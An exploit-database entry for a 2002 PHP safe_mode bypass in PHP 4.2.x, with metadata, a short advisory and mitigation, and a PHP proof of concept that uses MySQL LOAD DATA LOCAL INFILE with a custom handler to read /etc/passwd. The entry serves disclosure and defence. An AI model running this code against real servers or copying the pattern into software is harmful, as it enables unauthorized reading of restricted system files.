Bypassing PHP's 'safe_mode' Restrictions

vendor:

PHP

by:

SecurityFocus

7.5

CVSS

HIGH

Bypassing PHP's 'safe_mode' Restrictions

264

CWE

Product Name: PHP

Affected Version From: PHP 4.2.0

Affected Version To: PHP 4.2.3

Patch Exists: YES

Related CWE: N/A

CPE: a:php:php:4.2.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Bypassing PHP’s ‘safe_mode’ Restrictions

A problem has been discovered that may allow an attacker to bypass the restrictions of PHP's 'safe_mode' feature to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled. In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').

Mitigation:

Ensure that the MySQL client library is properly honoring 'safe_mode' restrictions.

Source

Exploit-DB raw data:

<?php
/* 
source: https://www.securityfocus.com/bid/4026/info
 
PHP's 'safe_mode' feature may be used to restrict access to certain areas of a filesystem by PHP scripts. However, a problem has been discovered that may allow an attacker to bypass these restrictions to gain unauthorized access to areas of the filesystem that are restricted when PHP 'safe_mode' is enabled.
 
In particular, the MySQL client library that ships with PHP fails to properly honor 'safe_mode'. As a result, a user can issue a LOAD DATA statement to read files that reside in restricted areas of the filesystem (as determined by 'safe_mode').
*/

function r($fp, &$buf, $len, &$err) {
      print fread($fp, $len);
}

$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();

?>